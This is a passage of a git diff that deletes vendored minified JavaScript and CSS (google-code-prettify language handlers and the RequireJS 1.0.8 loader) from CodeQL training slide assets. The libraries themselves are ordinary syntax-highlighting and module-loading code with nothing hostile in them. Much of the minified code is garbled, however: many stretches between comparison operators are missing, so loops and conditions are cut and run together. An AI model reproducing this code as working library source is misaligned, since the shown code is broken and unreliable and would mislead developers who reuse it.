r-one|years-from-duration|year-from-dateTime|year-from-date|upper-case|unordered|true|translate|trace|tokenize|timezone-from-time|timezone-from-dateTime|timezone-from-date|sum|subtract-dateTimes-yielding-yearMonthDuration|subtract-dateTimes-yielding-dayTimeDuration|substring-before|substring-after|substring|subsequence|string-to-codepoints|string-pad|string-length|string-join|string|static-base-uri|starts-with|seconds-from-time|seconds-from-duration|seconds-from-dateTime|round-half-to-even|round|root|reverse|resolve-uri|resolve-QName|replace|remove|QName|prefix-from-QName|position|one-or-more|number|not|normalize-unicode|normalize-space|node-name|node-kind|nilled|namespace-uri-from-QName|namespace-uri-for-prefix|namespace-uri|name|months-from-duration|month-from-dateTime|month-from-date|minutes-from-time|minutes-from-duration|minutes-from-dateTime|min|max|matches|lower-case|local-name-from-QName|local-name|last|lang|iri-to-uri|insert-before|index-of|in-scope-prefixes|implicit-timezone|idref|id|hours-from-time|hours-from-duration|hours-from-dateTime|floor|false|expanded-QName|exists|exactly-one|escape-uri|escape-html-uri|error|ends-with|encode-for-uri|empty|document-uri|doc-available|doc|distinct-values|distinct-nodes|default-collation|deep-equal|days-from-duration|day-from-dateTime|day-from-date|data|current-time|current-dateTime|current-date|count|contains|concat|compare|collection|codepoints-to-string|codepoint-equal|ceiling|boolean|base-uri|avg|adjust-time-to-timezone|adjust-dateTime-to-timezone|adjust-date-to-timezone|abs)\b/], -["pln",/^[\w:-]+/],["pln",/^[\t\n\r \xa0]+/]]),["xq","xquery"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-yaml.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-yaml.js deleted file mode 100644 index c38729b6cfb6..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-yaml.js +++ /dev/null @@ -1,2 +0,0 @@ -var a=null; -PR.registerLangHandler(PR.createSimpleLexer([["pun",/^[:>?|]+/,a,":|>?"],["dec",/^%(?:YAML|TAG)[^\n\r#]+/,a,"%"],["typ",/^&\S+/,a,"&"],["typ",/^!\S*/,a,"!"],["str",/^"(?:[^"\\]|\\.)*(?:"|$)/,a,'"'],["str",/^'(?:[^']|'')*(?:'|$)/,a,"'"],["com",/^#[^\n\r]*/,a,"#"],["pln",/^\s+/,a," \t\r\n"]],[["dec",/^(?:---|\.\.\.)(?:[\n\r]|$)/],["pun",/^-/],["kwd",/^\w+:[\n\r ]/],["pln",/^\w+/]]),["yaml","yml"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/prettify.css b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/prettify.css deleted file mode 100644 index d44b3a2282ad..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/prettify.css +++ /dev/null @@ -1 +0,0 @@ -.pln{color:#000}@media screen{.str{color:#080}.kwd{color:#008}.com{color:#800}.typ{color:#606}.lit{color:#066}.pun,.opn,.clo{color:#660}.tag{color:#008}.atn{color:#606}.atv{color:#080}.dec,.var{color:#606}.fun{color:red}}@media print,projection{.str{color:#060}.kwd{color:#006;font-weight:bold}.com{color:#600;font-style:italic}.typ{color:#404;font-weight:bold}.lit{color:#044}.pun,.opn,.clo{color:#440}.tag{color:#006;font-weight:bold}.atn{color:#404}.atv{color:#060}}pre.prettyprint{padding:2px;border:1px solid #888}ol.linenums{margin-top:0;margin-bottom:0}li.L0,li.L1,li.L2,li.L3,li.L5,li.L6,li.L7,li.L8{list-style-type:none}li.L1,li.L3,li.L5,li.L7,li.L9{background:#eee} \ No newline at end of file diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/prettify.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/prettify.js deleted file mode 100644 index eef5ad7e6a07..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/prettify.js +++ /dev/null @@ -1,28 +0,0 @@ -var q=null;window.PR_SHOULD_USE_CONTINUATION=!0; -(function(){function L(a){function m(a){var f=a.charCodeAt(0);if(f!==92)return f;var b=a.charAt(1);return(f=r[b])?f:"0"<=b&&b<="7"?parseInt(a.substring(1),8):b==="u"||b==="x"?parseInt(a.substring(2),16):a.charCodeAt(1)}function e(a){if(a<32)return(a<16?"\\x0":"\\x")+a.toString(16);a=String.fromCharCode(a);if(a==="\\"||a==="-"||a==="["||a==="]")a="\\"+a;return a}function h(a){for(var f=a.substring(1,a.length-1).match(/\\u[\dA-Fa-f]{4}|\\x[\dA-Fa-f]{2}|\\[0-3][0-7]{0,2}|\\[0-7]{1,2}|\\[\S\s]|[^\\]/g),a= -[],b=[],o=f[0]==="^",c=o?1:0,i=f.length;c122||(d<65||j>90||b.push([Math.max(65,j)|32,Math.min(d,90)|32]),d<97||j>122||b.push([Math.max(97,j)&-33,Math.min(d,122)&-33]))}}b.sort(function(a,f){return a[0]-f[0]||f[1]-a[1]});f=[];j=[NaN,NaN];for(c=0;ci[0]&&(i[1]+1>i[0]&&b.push("-"),b.push(e(i[1])));b.push("]");return b.join("")}function y(a){for(var f=a.source.match(/\[(?:[^\\\]]|\\[\S\s])*]|\\u[\dA-Fa-f]{4}|\\x[\dA-Fa-f]{2}|\\\d+|\\[^\dux]|\(\?[!:=]|[()^]|[^()[\\^]+/g),b=f.length,d=[],c=0,i=0;c=2&&a==="["?f[c]=h(j):a!=="\\"&&(f[c]=j.replace(/[A-Za-z]/g,function(a){a=a.charCodeAt(0);return"["+String.fromCharCode(a&-33,a|32)+"]"}));return f.join("")}for(var t=0,s=!1,l=!1,p=0,d=a.length;p=5&&"lang-"===b.substring(0,5))&&!(o&&typeof o[1]==="string"))c=!1,b="src";c||(r[f]=b)}i=d;d+=f.length;if(c){c=o[1];var j=f.indexOf(c),k=j+c.length;o[2]&&(k=f.length-o[2].length,j=k-c.length);b=b.substring(5);B(l+i,f.substring(0,j),e,p);B(l+i+j,c,C(b,c),p);B(l+i+k,f.substring(k),e,p)}else p.push(l+i,b)}a.e=p}var h={},y;(function(){for(var e=a.concat(m), -l=[],p={},d=0,g=e.length;d=0;)h[n.charAt(k)]=r;r=r[1];n=""+r;p.hasOwnProperty(n)||(l.push(r),p[n]=q)}l.push(/[\S\s]/);y=L(l)})();var t=m.length;return e}function u(a){var m=[],e=[];a.tripleQuotedStrings?m.push(["str",/^(?:'''(?:[^'\\]|\\[\S\s]|''?(?=[^']))*(?:'''|$)|"""(?:[^"\\]|\\[\S\s]|""?(?=[^"]))*(?:"""|$)|'(?:[^'\\]|\\[\S\s])*(?:'|$)|"(?:[^"\\]|\\[\S\s])*(?:"|$))/,q,"'\""]):a.multiLineStrings?m.push(["str",/^(?:'(?:[^'\\]|\\[\S\s])*(?:'|$)|"(?:[^"\\]|\\[\S\s])*(?:"|$)|`(?:[^\\`]|\\[\S\s])*(?:`|$))/, -q,"'\"`"]):m.push(["str",/^(?:'(?:[^\n\r'\\]|\\.)*(?:'|$)|"(?:[^\n\r"\\]|\\.)*(?:"|$))/,q,"\"'"]);a.verbatimStrings&&e.push(["str",/^@"(?:[^"]|"")*(?:"|$)/,q]);var h=a.hashComments;h&&(a.cStyleComments?(h>1?m.push(["com",/^#(?:##(?:[^#]|#(?!##))*(?:###|$)|.*)/,q,"#"]):m.push(["com",/^#(?:(?:define|elif|else|endif|error|ifdef|include|ifndef|line|pragma|undef|warning)\b|[^\n\r]*)/,q,"#"]),e.push(["str",/^<(?:(?:(?:\.\.\/)*|\/?)(?:[\w-]+(?:\/[\w-]+)+)?[\w-]+\.h|[a-z]\w*)>/,q])):m.push(["com",/^#[^\n\r]*/, -q,"#"]));a.cStyleComments&&(e.push(["com",/^\/\/[^\n\r]*/,q]),e.push(["com",/^\/\*[\S\s]*?(?:\*\/|$)/,q]));a.regexLiterals&&e.push(["lang-regex",/^(?:^^\.?|[!+-]|!=|!==|#|%|%=|&|&&|&&=|&=|\(|\*|\*=|\+=|,|-=|->|\/|\/=|:|::|;|<|<<|<<=|<=|=|==|===|>|>=|>>|>>=|>>>|>>>=|[?@[^]|\^=|\^\^|\^\^=|{|\||\|=|\|\||\|\|=|~|break|case|continue|delete|do|else|finally|instanceof|return|throw|try|typeof)\s*(\/(?=[^*/])(?:[^/[\\]|\\[\S\s]|\[(?:[^\\\]]|\\[\S\s])*(?:]|$))+\/)/]);(h=a.types)&&e.push(["typ",h]);a=(""+a.keywords).replace(/^ | $/g, -"");a.length&&e.push(["kwd",RegExp("^(?:"+a.replace(/[\s,]+/g,"|")+")\\b"),q]);m.push(["pln",/^\s+/,q," \r\n\t\xa0"]);e.push(["lit",/^@[$_a-z][\w$@]*/i,q],["typ",/^(?:[@_]?[A-Z]+[a-z][\w$@]*|\w+_t\b)/,q],["pln",/^[$_a-z][\w$@]*/i,q],["lit",/^(?:0x[\da-f]+|(?:\d(?:_\d+)*\d*(?:\.\d*)?|\.\d\+)(?:e[+-]?\d+)?)[a-z]*/i,q,"0123456789"],["pln",/^\\[\S\s]?/,q],["pun",/^.[^\s\w"-$'./@\\`]*/,q]);return x(m,e)}function D(a,m){function e(a){switch(a.nodeType){case 1:if(k.test(a.className))break;if("BR"===a.nodeName)h(a), -a.parentNode&&a.parentNode.removeChild(a);else for(a=a.firstChild;a;a=a.nextSibling)e(a);break;case 3:case 4:if(p){var b=a.nodeValue,d=b.match(t);if(d){var c=b.substring(0,d.index);a.nodeValue=c;(b=b.substring(d.index+d[0].length))&&a.parentNode.insertBefore(s.createTextNode(b),a.nextSibling);h(a);c||a.parentNode.removeChild(a)}}}}function h(a){function b(a,d){var e=d?a.cloneNode(!1):a,f=a.parentNode;if(f){var f=b(f,1),g=a.nextSibling;f.appendChild(e);for(var h=g;h;h=g)g=h.nextSibling,f.appendChild(h)}return e} -for(;!a.nextSibling;)if(a=a.parentNode,!a)return;for(var a=b(a.nextSibling,0),e;(e=a.parentNode)&&e.nodeType===1;)a=e;d.push(a)}var k=/(?:^|\s)nocode(?:\s|$)/,t=/\r\n?|\n/,s=a.ownerDocument,l;a.currentStyle?l=a.currentStyle.whiteSpace:window.getComputedStyle&&(l=s.defaultView.getComputedStyle(a,q).getPropertyValue("white-space"));var p=l&&"pre"===l.substring(0,3);for(l=s.createElement("LI");a.firstChild;)l.appendChild(a.firstChild);for(var d=[l],g=0;g=0;){var h=m[e];A.hasOwnProperty(h)?window.console&&console.warn("cannot override language handler %s",h):A[h]=a}}function C(a,m){if(!a||!A.hasOwnProperty(a))a=/^\s*=o&&(h+=2);e>=c&&(a+=2)}}catch(w){"console"in window&&console.log(w&&w.stack?w.stack:w)}}var v=["break,continue,do,else,for,if,return,while"],w=[[v,"auto,case,char,const,default,double,enum,extern,float,goto,int,long,register,short,signed,sizeof,static,struct,switch,typedef,union,unsigned,void,volatile"], -"catch,class,delete,false,import,new,operator,private,protected,public,this,throw,true,try,typeof"],F=[w,"alignof,align_union,asm,axiom,bool,concept,concept_map,const_cast,constexpr,decltype,dynamic_cast,explicit,export,friend,inline,late_check,mutable,namespace,nullptr,reinterpret_cast,static_assert,static_cast,template,typeid,typename,using,virtual,where"],G=[w,"abstract,boolean,byte,extends,final,finally,implements,import,instanceof,null,native,package,strictfp,super,synchronized,throws,transient"], -H=[G,"as,base,by,checked,decimal,delegate,descending,dynamic,event,fixed,foreach,from,group,implicit,in,interface,internal,into,is,lock,object,out,override,orderby,params,partial,readonly,ref,sbyte,sealed,stackalloc,string,select,uint,ulong,unchecked,unsafe,ushort,var"],w=[w,"debugger,eval,export,function,get,null,set,undefined,var,with,Infinity,NaN"],I=[v,"and,as,assert,class,def,del,elif,except,exec,finally,from,global,import,in,is,lambda,nonlocal,not,or,pass,print,raise,try,with,yield,False,True,None"], -J=[v,"alias,and,begin,case,class,def,defined,elsif,end,ensure,false,in,module,next,nil,not,or,redo,rescue,retry,self,super,then,true,undef,unless,until,when,yield,BEGIN,END"],v=[v,"case,done,elif,esac,eval,fi,function,in,local,set,then,until"],K=/^(DIR|FILE|vector|(de|priority_)?queue|list|stack|(const_)?iterator|(multi)?(set|map)|bitset|u?(int|float)\d*)/,N=/\S/,O=u({keywords:[F,H,w,"caller,delete,die,do,dump,elsif,eval,exit,foreach,for,goto,if,import,last,local,my,next,no,our,print,package,redo,require,sub,undef,unless,until,use,wantarray,while,BEGIN,END"+ -I,J,v],hashComments:!0,cStyleComments:!0,multiLineStrings:!0,regexLiterals:!0}),A={};k(O,["default-code"]);k(x([],[["pln",/^[^]*(?:>|$)/],["com",/^<\!--[\S\s]*?(?:--\>|$)/],["lang-",/^<\?([\S\s]+?)(?:\?>|$)/],["lang-",/^<%([\S\s]+?)(?:%>|$)/],["pun",/^(?:<[%?]|[%?]>)/],["lang-",/^]*>([\S\s]+?)<\/xmp\b[^>]*>/i],["lang-js",/^]*>([\S\s]*?)(<\/script\b[^>]*>)/i],["lang-css",/^]*>([\S\s]*?)(<\/style\b[^>]*>)/i],["lang-in.tag",/^(<\/?[a-z][^<>]*>)/i]]), -["default-markup","htm","html","mxml","xhtml","xml","xsl"]);k(x([["pln",/^\s+/,q," \t\r\n"],["atv",/^(?:"[^"]*"?|'[^']*'?)/,q,"\"'"]],[["tag",/^^<\/?[a-z](?:[\w-.:]*\w)?|\/?>$/i],["atn",/^(?!style[\s=]|on)[a-z](?:[\w:-]*\w)?/i],["lang-uq.val",/^=\s*([^\s"'>]*(?:[^\s"'/>]|\/(?=\s)))/],["pun",/^[/<->]+/],["lang-js",/^on\w+\s*=\s*"([^"]+)"/i],["lang-js",/^on\w+\s*=\s*'([^']+)'/i],["lang-js",/^on\w+\s*=\s*([^\s"'>]+)/i],["lang-css",/^style\s*=\s*"([^"]+)"/i],["lang-css",/^style\s*=\s*'([^']+)'/i],["lang-css", -/^style\s*=\s*([^\s"'>]+)/i]]),["in.tag"]);k(x([],[["atv",/^[\S\s]+/]]),["uq.val"]);k(u({keywords:F,hashComments:!0,cStyleComments:!0,types:K}),["c","cc","cpp","cxx","cyc","m"]);k(u({keywords:"null,true,false"}),["json"]);k(u({keywords:H,hashComments:!0,cStyleComments:!0,verbatimStrings:!0,types:K}),["cs"]);k(u({keywords:G,cStyleComments:!0}),["java"]);k(u({keywords:v,hashComments:!0,multiLineStrings:!0}),["bsh","csh","sh"]);k(u({keywords:I,hashComments:!0,multiLineStrings:!0,tripleQuotedStrings:!0}), -["cv","py"]);k(u({keywords:"caller,delete,die,do,dump,elsif,eval,exit,foreach,for,goto,if,import,last,local,my,next,no,our,print,package,redo,require,sub,undef,unless,until,use,wantarray,while,BEGIN,END",hashComments:!0,multiLineStrings:!0,regexLiterals:!0}),["perl","pl","pm"]);k(u({keywords:J,hashComments:!0,multiLineStrings:!0,regexLiterals:!0}),["rb"]);k(u({keywords:w,cStyleComments:!0,regexLiterals:!0}),["js"]);k(u({keywords:"all,and,by,catch,class,else,extends,false,finally,for,if,in,is,isnt,loop,new,no,not,null,of,off,on,or,return,super,then,true,try,unless,until,when,while,yes", -hashComments:3,cStyleComments:!0,multilineStrings:!0,tripleQuotedStrings:!0,regexLiterals:!0}),["coffee"]);k(x([],[["str",/^[\S\s]+/]]),["regex"]);window.prettyPrintOne=function(a,m,e){var h=document.createElement("PRE");h.innerHTML=a;e&&D(h,e);E({g:m,i:e,h:h});return h.innerHTML};window.prettyPrint=function(a){function m(){for(var e=window.PR_SHOULD_USE_CONTINUATION?l.now()+250:Infinity;p=0){var k=k.match(g),f,b;if(b= -!k){b=n;for(var o=void 0,c=b.firstChild;c;c=c.nextSibling)var i=c.nodeType,o=i===1?o?b:c:i===3?N.test(c.nodeValue)?b:o:o;b=(f=o===b?void 0:o)&&"CODE"===f.tagName}b&&(k=f.className.match(g));k&&(k=k[1]);b=!1;for(o=n.parentNode;o;o=o.parentNode)if((o.tagName==="pre"||o.tagName==="code"||o.tagName==="xmp")&&o.className&&o.className.indexOf("prettyprint")>=0){b=!0;break}b||((b=(b=n.className.match(/\blinenums\b(?::(\d+))?/))?b[1]&&b[1].length?+b[1]:!0:!1)&&D(n,b),d={g:k,h:n,i:b},E(d))}}p0&&(g.splice(m-1,2),m-=2);m=q.pkgs[g=b[0]];b=b.join("/");m&&b===g+"/"+m.main&&(b=g)}else b.indexOf("./")=== -0&&(b=b.substring(2));return b}function l(b,f){var g=b?b.indexOf("!"):-1,m=null,a=f?f.name:null,h=b,e,d;g!==-1&&(m=b.substring(0,g),b=b.substring(g+1,b.length));m&&(m=c(m,a));b&&(m?e=(g=n[m])&&g.normalize?g.normalize(b,function(b){return c(b,a)}):c(b,a):(e=c(b,a),d=G[e],d||(d=i.nameToUrl(b,null,f),G[e]=d)));return{prefix:m,name:e,parentMap:f,url:d,originalName:h,fullName:m?m+"!"+(e||""):e}}function j(){var b=!0,f=q.priorityWait,g,a;if(f){for(a=0;g=f[a];a++)if(!s[g]){b=!1;break}b&&delete q.priorityWait}return b} -function k(b,f,g){return function(){var a=ha.call(arguments,0),c;if(g&&K(c=a[a.length-1]))c.__requireJsBuild=!0;a.push(f);return b.apply(null,a)}}function t(b,f,g){f=k(g||i.require,b,f);$(f,{nameToUrl:k(i.nameToUrl,b),toUrl:k(i.toUrl,b),defined:k(i.requireDefined,b),specified:k(i.requireSpecified,b),isBrowser:d.isBrowser});return f}function p(b){var f,g,a,c=b.callback,h=b.map,e=h.fullName,ca=b.deps;a=b.listeners;var j=q.requireExecCb||d.execCb;if(c&&K(c)){if(q.catchError.define)try{g=j(e,b.callback, -ca,n[e])}catch(k){f=k}else g=j(e,b.callback,ca,n[e]);if(e)(c=b.cjsModule)&&c.exports!==r&&c.exports!==n[e]?g=n[e]=b.cjsModule.exports:g===r&&b.usingExports?g=n[e]:(n[e]=g,H[e]&&(T[e]=!0))}else e&&(g=n[e]=c,H[e]&&(T[e]=!0));if(x[b.id])delete x[b.id],b.isDone=!0,i.waitCount-=1,i.waitCount===0&&(J=[]);delete M[e];if(d.onResourceLoad&&!b.placeholder)d.onResourceLoad(i,h,b.depArray);if(f)return g=(e?l(e).url:"")||f.fileName||f.sourceURL,a=f.moduleTree,f=P("defineerror",'Error evaluating module "'+e+'" at location "'+ -g+'":\n'+f+"\nfileName:"+g+"\nlineNumber: "+(f.lineNumber||f.line),f),f.moduleName=e,f.moduleTree=a,d.onError(f);for(f=0;c=a[f];f++)c(g);return r}function u(b,f){return function(g){b.depDone[f]||(b.depDone[f]=!0,b.deps[f]=g,b.depCount-=1,b.depCount||p(b))}}function o(b,f){var g=f.map,a=g.fullName,c=g.name,h=N[b]||(N[b]=n[b]),e;if(!f.loading)f.loading=!0,e=function(b){f.callback=function(){return b};p(f);s[f.id]=!0;A()},e.fromText=function(b,f){var g=Q;s[b]=!1;i.scriptCount+=1;i.fake[b]=!0;g&&(Q=!1); -d.exec(f);g&&(Q=!0);i.completeLoad(b)},a in n?e(n[a]):h.load(c,t(g.parentMap,!0,function(b,a){var c=[],e,m;for(e=0;m=b[e];e++)m=l(m,g.parentMap),b[e]=m.fullName,m.prefix||c.push(b[e]);f.moduleDeps=(f.moduleDeps||[]).concat(c);return i.require(b,a)}),e,q)}function y(b){x[b.id]||(x[b.id]=b,J.push(b),i.waitCount+=1)}function D(b){this.listeners.push(b)}function v(b,f){var g=b.fullName,a=b.prefix,c=a?N[a]||(N[a]=n[a]):null,h,e;g&&(h=M[g]);if(!h&&(e=!0,h={id:(a&&!c?O++ +"__p@:":"")+(g||"__r@"+O++),map:b, -depCount:0,depDone:[],depCallbacks:[],deps:[],listeners:[],add:D},B[h.id]=!0,g&&(!a||N[a])))M[g]=h;a&&!c?(g=l(a),a in n&&!n[a]&&(delete n[a],delete R[g.url]),a=v(g,!0),a.add(function(){var f=l(b.originalName,b.parentMap),f=v(f,!0);h.placeholder=!0;f.add(function(b){h.callback=function(){return b};p(h)})})):e&&f&&(s[h.id]=!1,i.paused.push(h),y(h));return h}function C(b,f,a,c){var b=l(b,c),d=b.name,h=b.fullName,e=v(b),j=e.id,k=e.deps,o;if(h){if(h in n||s[j]===!0||h==="jquery"&&q.jQuery&&q.jQuery!== -a().fn.jquery)return;B[j]=!0;s[j]=!0;h==="jquery"&&a&&W(a())}e.depArray=f;e.callback=a;for(a=0;a0)return r;if(q.priorityWait)if(j())A();else return r;for(h in s)if(!(h in L)&&(c=!0,!s[h]))if(b)a+=h+" ";else if(l=!0,h.indexOf("!")===-1){k=[];break}else(e=M[h]&&M[h].moduleDeps)&&k.push.apply(k,e);if(!c&&!i.waitCount)return r;if(b&&a)return b=P("timeout","Load timeout for modules: "+a),b.requireType="timeout",b.requireModules=a,b.contextName=i.contextName,d.onError(b); -if(l&&k.length)for(a=0;h=x[k[a]];a++)if(h=F(h,{})){z(h,{});break}if(!b&&(l||i.scriptCount)){if((I||da)&&!X)X=setTimeout(function(){X=0;E()},50);return r}if(i.waitCount){for(a=0;h=J[a];a++)z(h,{});i.paused.length&&A();Y<5&&(Y+=1,E())}Y=0;d.checkReadyState();return r}var i,A,q={waitSeconds:7,baseUrl:"./",paths:{},pkgs:{},catchError:{}},S=[],B={require:!0,exports:!0,module:!0},G={},n={},s={},x={},J=[],R={},O=0,M={},N={},H={},T={},Z=0;W=function(b){if(!i.jQuery&&(b=b||(typeof jQuery!=="undefined"?jQuery: -null))&&!(q.jQuery&&b.fn.jquery!==q.jQuery)&&("holdReady"in b||"readyWait"in b))if(i.jQuery=b,w(["jquery",[],function(){return jQuery}]),i.scriptCount)V(b,!0),i.jQueryIncremented=!0};A=function(){var b,a,c,l,k,h;i.takeGlobalQueue();Z+=1;if(i.scriptCount<=0)i.scriptCount=0;for(;S.length;)if(b=S.shift(),b[0]===null)return d.onError(P("mismatch","Mismatched anonymous define() module: "+b[b.length-1]));else w(b);if(!q.priorityWait||j())for(;i.paused.length;){k=i.paused;i.pausedCount+=k.length;i.paused= -[];for(l=0;b=k[l];l++)a=b.map,c=a.url,h=a.fullName,a.prefix?o(a.prefix,b):!R[c]&&!s[h]&&((q.requireLoad||d.load)(i,h,c),c.indexOf("empty:")!==0&&(R[c]=!0));i.startTime=(new Date).getTime();i.pausedCount-=k.length}Z===1&&E();Z-=1;return r};i={contextName:a,config:q,defQueue:S,waiting:x,waitCount:0,specified:B,loaded:s,urlMap:G,urlFetched:R,scriptCount:0,defined:n,paused:[],pausedCount:0,plugins:N,needFullExec:H,fake:{},fullExec:T,managerCallbacks:M,makeModuleMap:l,normalize:c,configure:function(b){var a, -c,d;b.baseUrl&&b.baseUrl.charAt(b.baseUrl.length-1)!=="/"&&(b.baseUrl+="/");a=q.paths;d=q.pkgs;$(q,b,!0);if(b.paths){for(c in b.paths)c in L||(a[c]=b.paths[c]);q.paths=a}if((a=b.packagePaths)||b.packages){if(a)for(c in a)c in L||aa(d,a[c],c);b.packages&&aa(d,b.packages);q.pkgs=d}if(b.priority)c=i.requireWait,i.requireWait=!1,A(),i.require(b.priority),A(),i.requireWait=c,q.priorityWait=b.priority;if(b.deps||b.callback)i.require(b.deps||[],b.callback)},requireDefined:function(b,a){return l(b,a).fullName in -n},requireSpecified:function(b,a){return l(b,a).fullName in B},require:function(b,c,g){if(typeof b==="string"){if(K(c))return d.onError(P("requireargs","Invalid require call"));if(d.get)return d.get(i,b,c);c=l(b,c);b=c.fullName;return!(b in n)?d.onError(P("notloaded","Module name '"+c.fullName+"' has not been loaded yet for context: "+a)):n[b]}(b&&b.length||c)&&C(null,b,c,g);if(!i.requireWait)for(;!i.scriptCount&&i.paused.length;)A();return i.require},takeGlobalQueue:function(){U.length&&(ja.apply(i.defQueue, -[i.defQueue.length-1,0].concat(U)),U=[])},completeLoad:function(b){var a;for(i.takeGlobalQueue();S.length;)if(a=S.shift(),a[0]===null){a[0]=b;break}else if(a[0]===b)break;else w(a),a=null;a?w(a):w([b,[],b==="jquery"&&typeof jQuery!=="undefined"?function(){return jQuery}:null]);d.isAsync&&(i.scriptCount-=1);A();d.isAsync||(i.scriptCount-=1)},toUrl:function(b,a){var c=b.lastIndexOf("."),d=null;c!==-1&&(d=b.substring(c,b.length),b=b.substring(0,c));return i.nameToUrl(b,d,a)},nameToUrl:function(b,a,g){var l, -k,h,e,j=i.config,b=c(b,g&&g.fullName);if(d.jsExtRegExp.test(b))a=b+(a?a:"");else{l=j.paths;k=j.pkgs;g=b.split("/");for(e=g.length;e>0;e--)if(h=g.slice(0,e).join("/"),l[h]){g.splice(0,e,l[h]);break}else if(h=k[h]){b=b===h.name?h.location+"/"+h.main:h.location;g.splice(0,e,b);break}a=g.join("/")+(a||".js");a=(a.charAt(0)==="/"||a.match(/^[\w\+\.\-]+:/)?"":j.baseUrl)+a}return j.urlArgs?a+((a.indexOf("?")===-1?"?":"&")+j.urlArgs):a}};i.jQueryCheck=W;i.resume=A;return i}function ka(){var a,c,d;if(C&&C.readyState=== -"interactive")return C;a=document.getElementsByTagName("script");for(c=a.length-1;c>-1&&(d=a[c]);c--)if(d.readyState==="interactive")return C=d;return null}var la=/(\/\*([\s\S]*?)\*\/|([^:]|^)\/\/(.*)$)/mg,ma=/require\(\s*["']([^'"\s]+)["']\s*\)/g,fa=/^\.\//,ba=/\.js$/,O=Object.prototype.toString,u=Array.prototype,ha=u.slice,ja=u.splice,I=!!(typeof window!=="undefined"&&navigator&&document),da=!I&&typeof importScripts!=="undefined",na=I&&navigator.platform==="PLAYSTATION 3"?/^complete$/:/^(complete|loaded)$/, -ea=typeof opera!=="undefined"&&opera.toString()==="[object Opera]",L={},D={},U=[],C=null,Y=0,Q=!1,ia={require:!0,module:!0,exports:!0},d,u={},J,y,v,E,o,w,F,B,z,W,X;if(typeof define==="undefined"){if(typeof requirejs!=="undefined")if(K(requirejs))return;else u=requirejs,requirejs=r;typeof require!=="undefined"&&!K(require)&&(u=require,require=r);d=requirejs=function(a,c,d){var j="_",k;!G(a)&&typeof a!=="string"&&(k=a,G(c)?(a=c,c=d):a=[]);if(k&&k.context)j=k.context;d=D[j]||(D[j]=ga(j));k&&d.configure(k); -return d.require(a,c)};d.config=function(a){return d(a)};require||(require=d);d.toUrl=function(a){return D._.toUrl(a)};d.version="1.0.8";d.jsExtRegExp=/^\/|:|\?|\.js$/;y=d.s={contexts:D,skipAsync:{}};if(d.isAsync=d.isBrowser=I)if(v=y.head=document.getElementsByTagName("head")[0],E=document.getElementsByTagName("base")[0])v=y.head=E.parentNode;d.onError=function(a){throw a;};d.load=function(a,c,l){d.resourcesReady(!1);a.scriptCount+=1;d.attach(l,a,c);if(a.jQuery&&!a.jQueryIncremented)V(a.jQuery,!0), -a.jQueryIncremented=!0};define=function(a,c,d){var j,k;typeof a!=="string"&&(d=c,c=a,a=null);G(c)||(d=c,c=[]);!c.length&&K(d)&&d.length&&(d.toString().replace(la,"").replace(ma,function(a,d){c.push(d)}),c=(d.length===1?["require"]:["require","exports","module"]).concat(c));if(Q&&(j=J||ka()))a||(a=j.getAttribute("data-requiremodule")),k=D[j.getAttribute("data-requirecontext")];(k?k.defQueue:U).push([a,c,d]);return r};define.amd={multiversion:!0,plugins:!0,jQuery:!0};d.exec=function(a){return eval(a)}; -d.execCb=function(a,c,d,j){return c.apply(j,d)};d.addScriptToDom=function(a){J=a;E?v.insertBefore(a,E):v.appendChild(a);J=null};d.onScriptLoad=function(a){var c=a.currentTarget||a.srcElement,l;if(a.type==="load"||c&&na.test(c.readyState))C=null,a=c.getAttribute("data-requirecontext"),l=c.getAttribute("data-requiremodule"),D[a].completeLoad(l),c.detachEvent&&!ea?c.detachEvent("onreadystatechange",d.onScriptLoad):c.removeEventListener("load",d.onScriptLoad,!1)};d.attach=function(a,c,l,j,k,o){var p; -if(I)return j=j||d.onScriptLoad,p=c&&c.config&&c.config.xhtml?document.createElementNS("http://www.w3.org/1999/xhtml","html:script"):document.createElement("script"),p.type=k||c&&c.config.scriptType||"text/javascript",p.charset="utf-8",p.async=!y.skipAsync[a],c&&p.setAttribute("data-requirecontext",c.contextName),p.setAttribute("data-requiremodule",l),p.attachEvent&&!(p.attachEvent.toString&&p.attachEvent.toString().indexOf("[native code]")<0)&&!ea?(Q=!0,o?p.onreadystatechange=function(){if(p.readyState=== -"loaded")p.onreadystatechange=null,p.attachEvent("onreadystatechange",j),o(p)}:p.attachEvent("onreadystatechange",j)):p.addEventListener("load",j,!1),p.src=a,o||d.addScriptToDom(p),p;else da&&(importScripts(a),c.completeLoad(l));return null};if(I){o=document.getElementsByTagName("script");for(B=o.length-1;B>-1&&(w=o[B]);B--){if(!v)v=w.parentNode;if(F=w.getAttribute("data-main")){if(!u.baseUrl)o=F.split("/"),w=o.pop(),o=o.length?o.join("/")+"/":"./",u.baseUrl=o,F=w.replace(ba,"");u.deps=u.deps?u.deps.concat(F): -[F];break}}}d.checkReadyState=function(){var a=y.contexts,c;for(c in a)if(!(c in L)&&a[c].waitCount)return;d.resourcesReady(!0)};d.resourcesReady=function(a){var c,l;d.resourcesDone=a;if(d.resourcesDone)for(l in a=y.contexts,a)if(!(l in L)&&(c=a[l],c.jQueryIncremented))V(c.jQuery,!1),c.jQueryIncremented=!1};d.pageLoaded=function(){if(document.readyState!=="complete")document.readyState="complete"};if(I&&document.addEventListener&&!document.readyState)document.readyState="loading",window.addEventListener("load", -d.pageLoaded,!1);d(u);if(d.isAsync&&typeof setTimeout!=="undefined")z=y.contexts[u.context||"_"],z.requireWait=!0,setTimeout(function(){z.requireWait=!1;z.scriptCount||z.resume();d.checkReadyState()},0)}})(); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-controller.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-controller.js deleted file mode 100644 index 571317b9a048..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-controller.js +++ /dev/null @@ -1,109 +0,0 @@ 